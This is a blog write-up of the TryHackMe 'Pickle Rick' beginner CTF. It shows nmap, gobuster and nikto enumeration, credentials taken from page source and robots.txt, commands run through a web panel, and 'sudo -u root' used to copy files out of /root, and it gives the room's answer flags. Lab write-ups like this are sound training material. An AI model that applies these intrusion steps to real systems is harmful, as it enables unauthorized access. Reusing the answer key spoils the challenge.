<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Pickle Rick | chancej715</title>
<meta name="generator" content="Jekyll v4.3.2" />
<meta property="og:title" content="Pickle Rick" />
<meta name="author" content="Chance Johnson" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Beginner level web server CTF by tryhackme on TryHackMe." />
<meta property="og:description" content="Beginner level web server CTF by tryhackme on TryHackMe." />
<link rel="canonical" href="http://localhost:4000/writeups/2023-04-01-pickle-rick.html" />
<meta property="og:url" content="http://localhost:4000/writeups/2023-04-01-pickle-rick.html" />
<meta property="og:site_name" content="chancej715" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2023-04-01T00:00:00-05:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Pickle Rick" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Chance Johnson"},"dateModified":"2023-04-01T00:00:00-05:00","datePublished":"2023-04-01T00:00:00-05:00","description":"Beginner level web server CTF by tryhackme on TryHackMe.","headline":"Pickle Rick","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/writeups/2023-04-01-pickle-rick.html"},"publisher":{"@type":"Organization","logo":{"@type":"ImageObject","url":"http://localhost:4000/assets/img/logo.png"},"name":"Chance Johnson"},"url":"http://localhost:4000/writeups/2023-04-01-pickle-rick.html"}</script>
<!-- End Jekyll SEO tag -->

    <link rel="stylesheet" href="/assets/css/style.css?v=">
    <link rel="stylesheet" href="/assets/css/bootstrap.min.css">

    <!--[if lt IE 9]>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js"></script>
    <![endif]-->
    <!-- start custom head snippets, customize with your own _includes/head-custom.html file -->

<!-- Setup Google Analytics -->



<!-- You can set your favicon here -->
<!-- link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" -->

<!-- end custom head snippets -->

  </head>
  <body>
    <div class="wrapper">
      <header class="mb-5">
        
          <a href="https://chancej715.github.io"><img src="/assets/img/logo.png" alt="Logo" /></a>
        

        <p class="font-monospace mt-3 mb-0">chancej715</p>
        <p class="font-monospace mt-2 text-muted">Penetration Tester</p>
      
        <!-- Socials -->
        <a href="https://github.com/chancej715" target="_blank" style="text-decoration: none" class="social">
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" class="bi bi-github" viewBox="0 0 16 16">
            <path d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.012 8.012 0 0 0 16 8c0-4.42-3.58-8-8-8z"/>
          </svg>
        </a>

        <a href="https://linkedin.com/in/chancej715" target="_blank" style="text-decoration: none" class="social">
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" class="bi bi-linkedin" viewBox="0 0 16 16">
            <path d="M0 1.146C0 .513.526 0 1.175 0h13.65C15.474 0 16 .513 16 1.146v13.708c0 .633-.526 1.146-1.175 1.146H1.175C.526 16 0 15.487 0 14.854V1.146zm4.943 12.248V6.169H2.542v7.225h2.401zm-1.2-8.212c.837 0 1.358-.554 1.358-1.248-.015-.709-.52-1.248-1.342-1.248-.822 0-1.359.54-1.359 1.248 0 .694.521 1.248 1.327 1.248h.016zm4.908 8.212V9.359c0-.216.016-.432.08-.586.173-.431.568-.878 1.232-.878.869 0 1.216.662 1.216 1.634v3.865h2.401V9.25c0-2.22-1.184-3.252-2.764-3.252-1.274 0-1.845.7-2.165 1.193v.025h-.016a5.54 5.54 0 0 1 .016-.025V6.169h-2.4c.03.678 0 7.225 0 7.225h2.4z"/>
          </svg>
        </a>
        
        <a href="https://twitter.com/chancej715" target="_blank" style="text-decoration: none" class="social">
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" class="bi bi-twitter" viewBox="0 0 16 16">
            <path d="M5.026 15c6.038 0 9.341-5.003 9.341-9.334 0-.14 0-.282-.006-.422A6.685 6.685 0 0 0 16 3.542a6.658 6.658 0 0 1-1.889.518 3.301 3.301 0 0 0 1.447-1.817 6.533 6.533 0 0 1-2.087.793A3.286 3.286 0 0 0 7.875 6.03a9.325 9.325 0 0 1-6.767-3.429 3.289 3.289 0 0 0 1.018 4.382A3.323 3.323 0 0 1 .64 6.575v.045a3.288 3.288 0 0 0 2.632 3.218 3.203 3.203 0 0 1-.865.115 3.23 3.23 0 0 1-.614-.057 3.283 3.283 0 0 0 3.067 2.277A6.588 6.588 0 0 1 .78 13.58a6.32 6.32 0 0 1-.78-.045A9.344 9.344 0 0 0 5.026 15z"/>
          </svg>
        </a>
      </header>
      <section>

      <h1>Pickle Rick</h1>
<p class="text-muted">2023-04-01</p>

<p class="view">Chance Johnson</p>

<p><a href="https://tryhackme.com/room/picklerick">Pickle Rick</a> is a beginner level web app CTF on TryHackMe by tryhackme. For this challenge, I will use Kali Linux.</p>

<h1 id="1-what-is-the-firstingredient-rick-needs">1. What is the first ingredient Rick needs?</h1>
<p>The description of this challenge says to exploit a web server. First I opened up Firefox and entered the given IP:
![[Screenshot from 2023-03-31 17-43-44.png]]</p>

<p>The text at the bottom says we must log on to Rick’s computer and find three ingredients to complete the pickle-reverse potion. The problem is that Rick forget his password.</p>

<p>Upon inspecting the HTML of the website, I found the following comment in the <code class="language-plaintext highlighter-rouge">&lt;body&gt;</code> tag:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;!--
	Note to self, remember username!
	Username: R1ckRul3s
--&gt;
</code></pre></div></div>

<p>Now I’ve got a username, <code class="language-plaintext highlighter-rouge">R1ckRul3s</code>, but where can I use it? I’ll do some more enumeration:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo nmap 10.10.225.43
</code></pre></div></div>

<p>Output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>22/tcp open  ssh
80/tcp open  http
</code></pre></div></div>

<p>There appears to be an SSH server listening on <code class="language-plaintext highlighter-rouge">22/tcp</code>.  When I attempt to login to the server with the “R1ckRul3s” username, I get a “permission denied (publickey)” message.</p>

<p>I’ll look for some more resources:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gobuster dir -u http://10.10.225.43/ -w /usr/share/wordlists/dirb/common.txt
</code></pre></div></div>

<p>The following resources were discovered:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/.hta
/.htpasswd
/.htaccess
/assets
/index.html
/robots.txt
/server-status
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">/server-status</code> page gave me an HTTP 403 Forbidden error. On the <code class="language-plaintext highlighter-rouge">/robots.txt</code> page was the text: <code class="language-plaintext highlighter-rouge">Wubbalubbadubdub</code>.</p>

<p>I’m going to do some more enumeration with Nikto:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nikto -host http://10.10.225.43
</code></pre></div></div>

<p>Output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 426, size: 5818ccf125686, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /login.php: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /login.php: Admin login page/section found.
</code></pre></div></div>

<p>Looks like this is an Apache server running on an Ubuntu host. The scan also found a<code class="language-plaintext highlighter-rouge">/login.php</code> page:
![[Screenshot from 2023-03-31 17-55-40 1.png]]</p>

<p>I already know the username is <code class="language-plaintext highlighter-rouge">R1ckRul3s</code>, but what is the password? I’ll try that text that was in the <code class="language-plaintext highlighter-rouge">/robots.txt</code> file: <code class="language-plaintext highlighter-rouge">Wubbalubbadubdub</code>.</p>

<p>Looks like it was successful. I am logged into what appears to be some kind of admin panel at <code class="language-plaintext highlighter-rouge">/portal.php</code>:
![[Screenshot from 2023-03-31 18-00-47.png]]</p>

<p>I already know this website is being hosted on an Ubuntu host, so I’m assuming this is an interface for running Bash commands. I typed in <code class="language-plaintext highlighter-rouge">ls</code> into the input field, and the following was printed to page:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
</code></pre></div></div>

<p>I appear to be in the root directory of the web server. It looks like one of the ingredients can be found in <code class="language-plaintext highlighter-rouge">Sup3rS3cretPickl3Ingred.txt</code>. I attempted to view the contents of this file with the command <code class="language-plaintext highlighter-rouge">cat Sup3rS3cretPickl3Ingred.txt</code>, but I was greeted with the following page:
![[Screenshot from 2023-03-31 18-09-36.png]]</p>

<p>I navigated to <code class="language-plaintext highlighter-rouge">http://10.10.225.43/Sup3rS3cretPickl3Ingred.txt</code> which displayed the text <code class="language-plaintext highlighter-rouge">mr. meeseek hair</code>.</p>

<p><strong>Answer</strong>: mr. meeseek hair</p>

<h1 id="2-whats-the-second-ingredient-rick-needs">2. Whats the second ingredient Rick needs?</h1>
<p>There’s another file in the web server root called <code class="language-plaintext highlighter-rouge">clue.txt</code>. I navigated to <code class="language-plaintext highlighter-rouge">http://10.10.225.43/clue.txt</code> and found the text <code class="language-plaintext highlighter-rouge">Look around the file system for the other ingredient.</code>.</p>

<p>I found another user <code class="language-plaintext highlighter-rouge">rick</code> in the <code class="language-plaintext highlighter-rouge">/home</code> directory, so I executed <code class="language-plaintext highlighter-rouge">ls /home/rick</code>, and found another regular file named <code class="language-plaintext highlighter-rouge">second ingredients</code>. Now how do I open this file? First, I attempt to copy the file to the web server root directory:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cp "/home/rick/second ingredients" .
</code></pre></div></div>

<p>However this didn’t seem to work, so I must not have sufficient permissions. After some messing around, I discovered I can execute commands as the root user:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo -u root whoami
</code></pre></div></div>

<p>Output: <code class="language-plaintext highlighter-rouge">root</code>. I’ll attempt to copy the file again:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo -u root cp "/home/rick/second ingredients" .
</code></pre></div></div>

<p>This time it appears to have worked, so I’ll navigate to <code class="language-plaintext highlighter-rouge">http://10.10.225.43/second ingredients</code> where I find the text <code class="language-plaintext highlighter-rouge">1 jerry tear</code>.</p>

<p><strong>Answer</strong>: 1 jerry tear</p>

<h1 id="3-whats-the-final-ingredient-rick-needs">3. Whats the final ingredient Rick needs?</h1>
<p>After some digging around, I found a text file called <code class="language-plaintext highlighter-rouge">3rd.txt</code> in the <code class="language-plaintext highlighter-rouge">/root</code> directory. I copied that to the Apache web server’s root directory:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo -u root cp /root/3rd.txt .
</code></pre></div></div>

<p>And navigated to <code class="language-plaintext highlighter-rouge">http://10.10.225.43/3rd.txt</code>, where I found the text <code class="language-plaintext highlighter-rouge">3rd ingredients: fleeb juice</code>.</p>

<p><strong>Answer</strong>: fleeb juice</p>



      </section>
    </div>
    <script src="/assets/js/scale.fix.js"></script>
  </body>
</html>
